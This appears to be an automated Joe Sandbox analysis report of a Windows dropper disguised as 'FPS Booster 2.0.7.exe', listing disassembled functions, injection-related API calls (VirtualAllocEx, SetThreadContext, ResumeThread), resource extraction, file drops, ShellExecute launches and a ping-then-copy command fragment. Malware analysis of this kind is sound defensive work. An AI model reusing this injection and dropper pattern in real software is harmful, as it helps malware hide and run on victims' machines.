                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: KernelObjectSecurity
                                                • String ID:
                                                • API String ID: 3015937269-0
                                                • Opcode ID: 141208be1d8dee3633c047daf8c1e029fe9105c0f9a4d69f03bf770fb74d15b8
                                                • Instruction ID: 057069958a0acd04ce0f53b4ac78fda85ed0868fdd46350dfad23c93fe401340
                                                • Opcode Fuzzy Hash: 141208be1d8dee3633c047daf8c1e029fe9105c0f9a4d69f03bf770fb74d15b8
                                                • Instruction Fuzzy Hash: D0211871900249DFDB10DF9AC485BEEBBF4EF48320F148429E519A7381D778A944CFA5
                                                Function 00F3C6B8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 551 f3c6b8-f3c703 553 f3c713-f3c743 Wow64SetThreadContext 551->553 554 f3c705-f3c711 551->554 556 f3c745-f3c74b 553->556 557 f3c74c-f3c77c 553->557 554->553 556->557
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00F3C736
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 2cc41217da41d0edbcc77304bc78ac6cfcaf072064c870a12ee29f574b9f5baa
                                                • Instruction ID: 20e44332895e98268b93c80cfe0e8dc6565664df5db8f11da31da91e04b49591
                                                • Opcode Fuzzy Hash: 2cc41217da41d0edbcc77304bc78ac6cfcaf072064c870a12ee29f574b9f5baa
                                                • Instruction Fuzzy Hash: 85211575D003098FDB10DFAAC4857EEBBF4EF48320F54842AD959A7241D7789945CFA1
                                                Function 00F3E308 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 561 f3e308-f3e35e 563 f3e360-f3e36c 561->563 564 f3e36e-f3e39b SetKernelObjectSecurity 561->564 563->564 565 f3e3a4-f3e3cc 564->565 566 f3e39d-f3e3a3 564->566 566->565
                                                APIs
                                                • SetKernelObjectSecurity.KERNELBASE(?,00000004,00000000,?,?,?,?,?,?,?,?,00F3E212,?), ref: 00F3E38E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: KernelObjectSecurity
                                                • String ID:
                                                • API String ID: 3015937269-0
                                                • Opcode ID: baa1ed0c53ec7fc1af73293443cae01de4a03ad1d097a04876997fcb04e841ee
                                                • Instruction ID: 3c8bab530e01f3b4f22405ce97ef0f6f8e0a14d4ce67049b7065f57ec5d3ce92
                                                • Opcode Fuzzy Hash: baa1ed0c53ec7fc1af73293443cae01de4a03ad1d097a04876997fcb04e841ee
                                                • Instruction Fuzzy Hash: 162137B19002098FDB14CFA9C4857DEBBF1EF48320F248429D519A7280D7789945CFA1
                                                Function 00F3CB2C Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 569 f3cb2c-f3ff33 VirtualProtectEx 572 f3ff35-f3ff3b 569->572 573 f3ff3c-f3ff5d 569->573 572->573
                                                APIs
                                                • VirtualProtectEx.KERNELBASE(?,?,?,?,00000050,?,?,?,?,00F3F190,?,00000040,00000032), ref: 00F3FF26
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 249dded46c02146fce3b71c261a633ecdf8345947d64aec838b0b77d86184b3a
                                                • Instruction ID: 82a3959216ca2f4351791cbe7fb9400e939046b13fcf48e7a25cd4fb6054030a
                                                • Opcode Fuzzy Hash: 249dded46c02146fce3b71c261a633ecdf8345947d64aec838b0b77d86184b3a
                                                • Instruction Fuzzy Hash: F321F776D04249DFDB10DF9AC844BDEBBF5EB49320F10842AE918A7251D374A944DFA1
                                                Function 00F3ED20 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00F3ED9B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: d2e4009c87cc3cec1c74c088eb7a75253e121fdd75690450ac1547df66a7ca97
                                                • Instruction ID: 28e5b54377da457d98fcffe98ef4f238473d6ec09837fb817bd0c53640fdaaaf
                                                • Opcode Fuzzy Hash: d2e4009c87cc3cec1c74c088eb7a75253e121fdd75690450ac1547df66a7ca97
                                                • Instruction Fuzzy Hash: FF2106B6D002599FDB10DF9AC885BDEFBF4EF48320F108429E958A7251D3789A45CFA1
                                                Function 00F3C978 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 00F3ED9B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 8cd5111d29e6de6ea049d49d0519529853e04a0b6abe6e9429e27451d9c6b1ec
                                                • Instruction ID: 3f8a7a1d36117a737ad08469199f37b4cc6f1c8534637723c64d0a9ee41e67ec
                                                • Opcode Fuzzy Hash: 8cd5111d29e6de6ea049d49d0519529853e04a0b6abe6e9429e27451d9c6b1ec
                                                • Instruction Fuzzy Hash: 31210675900249DFDB10DF9AC884BDEFBF4EF48320F108429E958A7251D378A944CFA1
                                                Function 00F3FEA9 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtectEx.KERNELBASE(?,?,?,?,00000050,?,?,?,?,00F3F190,?,00000040,00000032), ref: 00F3FF26
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 20a5a7570363f57b08f482edc8a26417dfc3f9c5b01c6eb4f072696d3aa5f3d8
                                                • Instruction ID: e4d7a5f315bb97926b06036ae5dfb0a5a71bdb2495657e11782165f5ac0725a4
                                                • Opcode Fuzzy Hash: 20a5a7570363f57b08f482edc8a26417dfc3f9c5b01c6eb4f072696d3aa5f3d8
                                                • Instruction Fuzzy Hash: 00213676D00249DFDB10CF9AC580BDEBBF5FB48320F10842AE958A7251D3789545CFA1
                                                Function 00F3CB98 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00F3CC06
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 4a28a7963c9dd77643dd8ce76b790c22ab44ff9145b38e77f7772f6d3673890c
                                                • Instruction ID: d1824d8d2fcb0a83afc6b0ed04043e2c8a45bb4b484aaf133052a86ca6c2cac6
                                                • Opcode Fuzzy Hash: 4a28a7963c9dd77643dd8ce76b790c22ab44ff9145b38e77f7772f6d3673890c
                                                • Instruction Fuzzy Hash: F01134729003499FDB10DFAAC845BDEBBF5EF48320F14842AE519A7250C779A950CFA1
                                                Function 00F3C602 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: daba00cc926f597d8beb056d4dee00ab8bda1c113702bb2f118fd66e4f102228
                                                • Instruction ID: 82b52ce1d55352f2a0ff75933320ffe7702233ccc295253c2f2a69b78fbddd73
                                                • Opcode Fuzzy Hash: daba00cc926f597d8beb056d4dee00ab8bda1c113702bb2f118fd66e4f102228
                                                • Instruction Fuzzy Hash: BB1158B1D003088FDB10DFAAC4457DEFBF4EB48320F248829C519A7240C7799A41CF94
                                                Function 00F3C608 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 2342c42d30ede4e9bdd97a11f2a7ace1bd4604bee77bc5eea8469db9c17a508c
                                                • Instruction ID: 177f27d57a7dfd19162d33554f0c47697d65ee7003484480d23ea4131a3ce7a9
                                                • Opcode Fuzzy Hash: 2342c42d30ede4e9bdd97a11f2a7ace1bd4604bee77bc5eea8469db9c17a508c
                                                • Instruction Fuzzy Hash: EC1125B1D003498BDB10DFAAC4457DEFBF5AB88320F24842AD559A7240C779A944CFA5
                                                Function 00F3FD30 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,00F3EEC7), ref: 00F3FD9F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: InfoSystem
                                                • String ID:
                                                • API String ID: 31276548-0
                                                • Opcode ID: 5377a3f8f832a89afeb91a9f9e677fd1e887045705d90644581370e5fe77ec6a
                                                • Instruction ID: bed0f2a5c1a0fe74927d72bcf1c9a8d829f76704b05cc36543e3f5883c441dc7
                                                • Opcode Fuzzy Hash: 5377a3f8f832a89afeb91a9f9e677fd1e887045705d90644581370e5fe77ec6a
                                                • Instruction Fuzzy Hash: 241102B5D002599BDB00DF9AD844BDEFBB4FB49324F10816AD818A7240D378A905CFA2

                                                Non-executed Functions

                                                Function 00F3F1C2 Relevance: .3, Instructions: 309COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0d5b5bcc1c2aa239a354aa763d88e0515882c07394c6c93a3b35b32f483e6ea9
                                                • Instruction ID: d5a04753635935faf6a3e195f6c9572f074c9d4ae03cd8acac0fbab0b79ed7c2
                                                • Opcode Fuzzy Hash: 0d5b5bcc1c2aa239a354aa763d88e0515882c07394c6c93a3b35b32f483e6ea9
                                                • Instruction Fuzzy Hash: 5BD1D371E012298FDB64CF69CC80BEDB7B2BF88314F1481EAD509A7255EB309E859F50
                                                Function 00F3F2B6 Relevance: .2, Instructions: 244COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d5d4ff20e1dec9aae9d44d089a350a8cdf8f4d1272d8ab553d169bda7db36f73
                                                • Instruction ID: 970cf8b863a18cc62c14512808cbaa1d38d437c5c9e531e212cfac0ae30a2575
                                                • Opcode Fuzzy Hash: d5d4ff20e1dec9aae9d44d089a350a8cdf8f4d1272d8ab553d169bda7db36f73
                                                • Instruction Fuzzy Hash: 88B1B271E012298FDB64CF69CD80BEDB7B2BF88314F1481E6D509A7255EB309E859F50

                                                Execution Graph

                                                Execution Coverage:64%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:59.3%
                                                Total number of Nodes:81
                                                Total number of Limit Nodes:10
                                                execution_graph 161 401ae1 GetCommandLineA GetModuleHandleA GetProcessHeap 164 401000 6 API calls 161->164 165 4010cc GetMessageA 164->165 166 4010e0 TranslateMessage DispatchMessageA 165->166 167 4010f4 ExitProcess 165->167 166->165 255 4018a8 lstrcpyA lstrcatA lstrcatA lstrcatA lstrcatA 256 401906 255->256 168 4010fb 169 401111 168->169 170 40110a 168->170 171 401117 169->171 172 40112f 169->172 179 40135a GetSystemDirectoryA PathAddBackslashA GetWindowsDirectoryA 170->179 223 4011cf 14 API calls 171->223 175 401142 DefWindowProcA 172->175 176 401135 PostQuitMessage 172->176 178 40111c SendMessageA 178->175 180 401395 GetTempPathA 179->180 181 4013af GetModuleFileNameA 180->181 182 4013cb GetEnvironmentVariableA 181->182 183 4013ed 182->183 224 401907 FindResourceA 183->224 185 40142a 186 401438 185->186 238 4011c4 185->238 235 401abe 186->235 190 401445 FindResourceA 191 401455 190->191 192 40145a SizeofResource 190->192 194 401887 191->194 195 40188e 191->195 192->191 193 401470 LoadResource 192->193 193->191 196 40148b LockResource 193->196 247 401157 lstrcpyA lstrcatA lstrcatA 194->247 199 401897 ExitProcess 195->199 200 40189c ExitProcess 195->200 196->191 198 40149f GlobalAlloc 196->198 198->191 202 4014ba RtlMoveMemory 198->202 203 4018a3 200->203 212 40150c 202->212 204 4014f9 GlobalAlloc 204->191 204->212 205 401515 RtlMoveMemory 206 401549 GlobalFree lstrcpynA 205->206 207 40159e lstrcpyA lstrlenA 206->207 206->212 207->212 208 4015c1 lstrcpyA lstrlenA 208->212 209 40163f lstrcpyA 210 40165f lstrcatA 209->210 211 401692 CreateFileA WriteFile 210->211 215 401677 210->215 214 4017cd CloseHandle GlobalFree SetFileAttributesA 211->214 211->215 212->204 212->205 212->206 212->208 212->209 213 401683 lstrcpyA 213->211 214->215 215->211 215->213 215->214 217 401866 FreeResource 215->217 218 401701 HeapAlloc WriteFile HeapFree 215->218 219 40174f CreateFileA GetFileSize CloseHandle 215->219 221 401824 lstrcpyA PathFindFileNameA 215->221 222 401854 ShellExecuteA 215->222 243 4012f7 215->243 217->190 217->191 218->214 219->214 220 40178d HeapAlloc WriteFile HeapFree 219->220 220->214 221->215 222->217 223->178 225 401925 SizeofResource 224->225 227 401920 224->227 225->227 228 40193b LoadResource 225->228 226 401b16 ExitProcess 227->226 228->227 229 401956 LockResource 228->229 229->227 230 40196a RtlMoveMemory 229->230 231 401993 230->231 232 4019a6 HeapAlloc RtlMoveMemory HeapAlloc RtlMoveMemory 231->232 233 401a09 GlobalAlloc RtlMoveMemory FreeResource 231->233 232->233 233->185 233->226 236 40143d 235->236 237 401ac7 MessageBoxA 235->237 236->190 237->236 249 40119d GetPEB 238->249 240 4011c9 252 4011af GetPEB 240->252 242 4011ce 242->186 244 401320 243->244 245 40132c lstrlenA 244->245 246 40134d 245->246 246->215 248 40119c 247->248 248->200 250 4011a9 249->250 250->240 251 401b16 ExitProcess 250->251 253 4011be 252->253 253->242 254 401b16 ExitProcess 253->254

                                                Callgraph

                                                Executed Functions

                                                Function 0040135A Relevance: 93.1, APIs: 43, Strings: 10, Instructions: 373COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 40135a-401431 GetSystemDirectoryA PathAddBackslashA GetWindowsDirectoryA GetTempPathA GetModuleFileNameA GetEnvironmentVariableA call 401907 11 401433 call 4011c4 0->11 12 401438-401443 call 401abe 0->12 11->12 16 401445-401453 FindResourceA 12->16 17 401455 16->17 18 40145a-401469 SizeofResource 16->18 19 40187e-401885 17->19 20 401470-401484 LoadResource 18->20 21 40146b 18->21 22 401887-40188c call 401157 19->22 23 40188e-401895 19->23 24 401486 20->24 25 40148b-401498 LockResource 20->25 21->19 30 40189c-40189e ExitProcess 22->30 29 401897 ExitProcess 23->29 23->30 24->19 27 40149a 25->27 28 40149f-4014b3 GlobalAlloc 25->28 27->19 32 4014b5 28->32 33 4014ba-401505 RtlMoveMemory call 401a90 GlobalAlloc 28->33 34 4018a3 30->34 32->19 37 401507 33->37 38 40150c-401513 33->38 37->19 39 401515-401526 RtlMoveMemory 38->39 40 401528-401541 38->40 41 401549-40159c GlobalFree lstrcpynA 39->41 40->41 42 4015b4-4015bf 41->42 43 40159e-4015b1 lstrcpyA lstrlenA 41->43 44 4015c1-4015d4 lstrcpyA lstrlenA 42->44 45 4015d7-4015dc 42->45 43->42 44->45 46 4015e6-4015e9 45->46 47 4015de-4015e4 45->47 49 4015f3-4015f6 46->49 50 4015eb-4015f1 46->50 48 40163f-401675 lstrcpyA lstrcatA 47->48 58 401692-4016d2 CreateFileA WriteFile 48->58 59 401677-401681 48->59 51 401600-401603 49->51 52 4015f8-4015fe 49->52 50->48 54 401605-40160b 51->54 55 40160d-401610 51->55 52->48 54->48 56 401612-401618 55->56 57 40161a-40161d 55->57 56->48 60 401627-40162a 57->60 61 40161f-401625 57->61 63 4016d8-4016e2 58->63 64 4017cd-4017f1 CloseHandle GlobalFree SetFileAttributesA 58->64 59->58 62 401683-40168d lstrcpyA 59->62 65 401634-401637 60->65 66 40162c-401632 60->66 61->48 62->58 63->64 69 4016e8-4016ef 63->69 67 4017f3-4017f8 call 4012f7 64->67 68 4017fd-401802 64->68 65->48 72 401639 65->72 66->48 67->68 74 401804-40180a 68->74 75 401866-401878 FreeResource 68->75 70 4016f1-4016fb 69->70 71 401746-40174d 69->71 70->64 76 401701-401741 HeapAlloc WriteFile HeapFree 70->76 71->64 77 40174f-40178b CreateFileA GetFileSize CloseHandle 71->77 72->48 78 401810-401813 74->78 79 40180c-40180e 74->79 75->16 75->19 76->64 77->64 80 40178d-4017c8 HeapAlloc WriteFile HeapFree 77->80 82 401815-401817 78->82 83 401819-40181c 78->83 81 401824-401849 lstrcpyA PathFindFileNameA 79->81 80->64 84 401852 81->84 85 40184b-401850 81->85 82->81 86 401822 83->86 87 40181e-401820 83->87 88 401854-401860 ShellExecuteA 84->88 85->88 86->81 87->81 88->75
                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(C:\Windows\system32\,00001000), ref: 0040136B
                                                • PathAddBackslashA.KERNELBASE(C:\Windows\system32\), ref: 00401375
                                                • GetWindowsDirectoryA.KERNEL32(00404C84,00001000), ref: 00401385
                                                • GetTempPathA.KERNEL32(00001000,00405C84), ref: 0040139F
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\,00000200), ref: 004013BB
                                                • GetEnvironmentVariableA.KERNEL32(APPDATA,00407C84,00001000), ref: 004013DD
                                                  • Part of subcall function 00401907: FindResourceA.KERNEL32(00000000,00001001,0000000A), ref: 00401917
                                                  • Part of subcall function 00401907: ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                • FindResourceA.KERNEL32(00000000,00000001,0000000A), ref: 0040144C
                                                • SizeofResource.KERNEL32(00000000,00000000,00000000,00000001,0000000A,00000001), ref: 00401462
                                                • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00000001,0000000A,00000001), ref: 0040147D
                                                • ExitProcess.KERNEL32(?,?,?,?,004106BC,00000000,00406C84,C0000000,00000003,00000000,00000002,00000080,00000000,00406C84,FPS Booster 2.0.7.exe), ref: 00401897
                                                • ExitProcess.KERNEL32(00000000,?,?,?,?,004106BC,00000000,00406C84,C0000000,00000003,00000000,00000002,00000080,00000000,00406C84,FPS Booster 2.0.7.exe), ref: 0040189E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: Resource$ExitProcess$DirectoryFindPath$BackslashEnvironmentFileLoadModuleNameSizeofSystemTempVariableWindows
                                                • String ID: /c ping -n 3 127.0.0.1 & copy /Y "$APPDATA$C:\Dir1\SubDir$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\$C:\Windows\system32\$FPS Booster 2.0.7.exe$hF$hF$open
                                                • API String ID: 1865746177-1906841479
                                                • Opcode ID: 4de04ce6448b2387a50d34b486c6be45e57025f18a70911a56270827189b1638
                                                • Instruction ID: 87517960ec9dbd09822493e96d6633269da166b851f384452dd9e845d648968f
                                                • Opcode Fuzzy Hash: 4de04ce6448b2387a50d34b486c6be45e57025f18a70911a56270827189b1638
                                                • Instruction Fuzzy Hash: 3ED18271A44205AFFB24AFA1DD42FA93AB4EB04715F20403BF501B51F1DBBD6A908B1E
                                                Function 004011CF Relevance: 47.3, APIs: 14, Strings: 13, Instructions: 53libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • LoadLibraryA.KERNEL32(Shell32.dll,0040111C), ref: 004011D4
                                                • GetProcAddress.KERNEL32(ShellExecuteA,Shell32.dll), ref: 004011E9
                                                • GetProcAddress.KERNEL32(SHGetSpecialFolderPathA,0040111C), ref: 004011FE
                                                • LoadLibraryA.KERNEL32(shlwapi.dll,SHGetSpecialFolderPathA,0040111C), ref: 0040120D
                                                • GetProcAddress.KERNEL32(PathFindFileNameA,shlwapi.dll), ref: 00401222
                                                • GetProcAddress.KERNEL32(PathAddBackslashA,PathFindFileNameA), ref: 00401237
                                                • LoadLibraryA.KERNEL32(advapi32.dll,PathAddBackslashA,PathFindFileNameA,shlwapi.dll,SHGetSpecialFolderPathA,0040111C), ref: 00401246
                                                • GetProcAddress.KERNEL32(RegCreateKeyExA,advapi32.dll), ref: 0040125B
                                                • GetProcAddress.KERNEL32(RegSetValueExA,RegCreateKeyExA), ref: 00401270
                                                • GetProcAddress.KERNEL32(RegCloseKey,RegSetValueExA), ref: 00401285
                                                • LoadLibraryA.KERNEL32(ntdll.dll,RegCloseKey,RegSetValueExA,RegCreateKeyExA,advapi32.dll,PathAddBackslashA,PathFindFileNameA,shlwapi.dll,SHGetSpecialFolderPathA,0040111C), ref: 00401294
                                                • GetProcAddress.KERNEL32(RtlDecompressBuffer,ntdll.dll), ref: 004012A9
                                                • GetModuleFileNameA.KERNEL32(00000000,0040BC84,00001000,RtlDecompressBuffer,ntdll.dll,RegCloseKey,RegSetValueExA,RegCreateKeyExA,advapi32.dll,PathAddBackslashA,PathFindFileNameA,shlwapi.dll,SHGetSpecialFolderPathA,0040111C), ref: 004012BF
                                                • GetEnvironmentVariableA.KERNEL32(ComSpec,0040FC84,00000500,00000000,0040BC84,00001000,RtlDecompressBuffer,ntdll.dll,RegCloseKey,RegSetValueExA,RegCreateKeyExA,advapi32.dll,PathAddBackslashA,PathFindFileNameA,shlwapi.dll,SHGetSpecialFolderPathA), ref: 004012D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: AddressProc$LibraryLoad$EnvironmentFileModuleNameVariable
                                                • String ID: ComSpec$PathAddBackslashA$PathFindFileNameA$RegCloseKey$RegCreateKeyExA$RegSetValueExA$RtlDecompressBuffer$SHGetSpecialFolderPathA$Shell32.dll$ShellExecuteA$advapi32.dll$ntdll.dll$shlwapi.dll
                                                • API String ID: 3647900824-1083084054
                                                • Opcode ID: ed63defba397cbb933b777222a0bacb8b6594ff129ae780b5b0ed5781ffeacf7
                                                • Instruction ID: a06bb1d97dbf063ac68fad512a01dcc274482fcad67705a1e8ff053d2cfa1aac
                                                • Opcode Fuzzy Hash: ed63defba397cbb933b777222a0bacb8b6594ff129ae780b5b0ed5781ffeacf7
                                                • Instruction Fuzzy Hash: AC11AA70A423046EE751BF32ED02BA93E75E790B45B20813BB440751F9E7FD19A19B1C
                                                Function 00401AE1 Relevance: 6.0, APIs: 4, Instructions: 15memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCommandLineA.KERNEL32 ref: 00401AE1
                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00401AED
                                                • GetProcessHeap.KERNEL32(00000000), ref: 00401AF7
                                                  • Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                                                  • Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                                                  • Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
                                                  • Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                                                  • Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
                                                  • Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
                                                  • Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                                                  • Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
                                                  • Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED
                                                • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
                                                • String ID:
                                                • API String ID: 673778540-0
                                                • Opcode ID: cfbab243bfee9b5cb56ef1db76fa81e74447810506c232cb5a36ea3a31cdea14
                                                • Instruction ID: a064688063e39c940ae72a4b90be644b02f79907e5f24655d35d5466687fb791
                                                • Opcode Fuzzy Hash: cfbab243bfee9b5cb56ef1db76fa81e74447810506c232cb5a36ea3a31cdea14
                                                • Instruction Fuzzy Hash: FBD067749452006AE6217F71AE02B143E64E70074BF10407AB6057A1F5EB786A10670D
                                                Function 004011AF Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 129 4011af-4011bc GetPEB 130 4011c3 129->130 131 4011be 129->131 132 401b16-401b1d ExitProcess 130->132 131->132
                                                APIs
                                                • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.1351346498.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_400000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: b282020c020ec24376e01dd257daea11e10f1f4ac2a3929f2a510d4130da15fc
                                                • Instruction ID: 363a1f89bed63b7dcc895a87b01cf0a5ad2b70b8edfb3c7b62b81fcb133e7216
                                                • Opcode Fuzzy Hash: b282020c020ec24376e01dd257daea11e10f1f4ac2a3929f2a510d4130da15fc
                                                • Instruction Fuzzy Hash: E7C09234268A84CAE219AB08C15AF1133B5BB40B45FA1846BB2152A8F293BCA810E44A
                                                Function 0040119D Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
